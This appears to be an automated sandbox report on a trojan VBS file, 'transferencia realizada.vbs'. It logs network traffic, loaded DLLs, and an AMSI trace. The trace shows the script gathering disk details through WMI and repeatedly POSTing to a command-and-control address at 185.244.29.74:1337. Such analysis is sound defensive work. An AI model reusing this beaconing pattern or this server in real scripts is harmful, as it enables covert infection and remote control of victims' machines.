Click to jump to signature section
Source: Submited Sample | Integrated Neural Analysis Model: Matched 95.7% probability |
Source: | Initial file: xx.SetRequestHeader "User-Agent", gg |
Source: unknown | Network traffic detected: HTTP traffic on port 49700 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49706 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49710 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49711 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49712 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49713 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49714 -> 1337 |
Source: unknown | Network traffic detected: HTTP traffic on port 49715 -> 1337 |
Source: global traffic | TCP traffic: 192.168.2.7:49700 -> 185.244.29.74:1337 |
Source: Joe Sandbox View | ASN Name: DAVID_CRAIGGG DAVID_CRAIGGG |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | TCP traffic detected without corresponding DNS query: 185.244.29.74 |
Source: unknown | HTTP traffic detected: POST /document HTTP/1.1Accept: */*User-Agent: B81A4609Accept-Language: en-chUA-CPU: AMD64Accept-Encoding: gzip, deflateHost: 185.244.29.74:1337Content-Length: 0Connection: Keep-AliveCache-Control: no-cache |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD38FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74/: |
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp, transferencia realizada.vbs | String found in binary or memory: http://185.244.29.74:1337/document |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/document-E |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/document-L |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/document.L |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/document2 |
Source: wscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/documentY |
Source: wscript.exe, 00000000.00000002.3744902769.000001BCD3075000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/documentZ |
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD11DD000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/document_q |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD3915000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/documentfE |
Source: wscript.exe, 00000000.00000002.3743575887.000001BCD123C000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.244.29.74:1337/documentp |
Source: wscript.exe, 00000000.00000002.3745132216.000001BCD38FA000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://login.live.com |
Source: C:\Windows\System32\wscript.exe | COM Object queried: XML HTTP HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{F6D90F16-9C73-11D3-B32E-00C04F990BB4} | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | COM Object queried: WBEM Locator HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{4590F811-1D3A-11D0-891F-00AA004B2E24} | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Management and Instrumentation HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{8BC3F05E-D86B-11D0-A075-00C04FB68820} | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8} | Jump to behavior |
Source: transferencia realizada.vbs | Initial sample: Strings found which are bigger than 50 |
Source: classification engine | Classification label: mal76.troj.evad.winVBS@1/0@0/1 |
Source: unknown | Process created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\transferencia realizada.vbs" |
Source: C:\Windows\System32\wscript.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: version.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: kernel.appcore.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: uxtheme.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sxs.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: vbscript.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: amsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: userenv.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: profapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wldp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msasn1.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptsp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: rsaenh.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: cryptbase.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msisip.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wshext.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrobj.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: msxml3.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wbemcomn.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mpr.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: scrrun.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: wininet.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iertutil.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mlang.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: urlmon.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: srvcli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: netutils.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: sspicli.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: windows.storage.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: ondemandconnroutehelper.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winhttp.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: mswsock.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: iphlpapi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Section loaded: winnsi.dll | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{B54F3741-5B07-11cf-A4B0-00AA004A55E8}\InprocServer32 | Jump to behavior |
Source: C:\Windows\System32\wscript.exe | Anti Malware Scan Interface: WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IHost.CreateObject("WScript.Shell");IWshShell3.ExpandEnvironmentStrings("%SYSTEMDRIVE%");ISWbemServicesEx.ExecQuery("SELECT * FROM Win32_LogicalDisk WHERE DeviceId='C:'");ISWbemObjectSet._NewEnum();ISWbemObjectEx._01800001();IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequest2.setRequestHeader("User-Agent", "B81A4609");IServerXMLHTTPRequest2.send();IServerXMLHTTPRequest2.responseText();IHost.Sleep("31110");IServerXMLHTTPRequest2.open("POST", "http://185.244.29.74:1337/document", "false");IServerXMLHTTPRequ |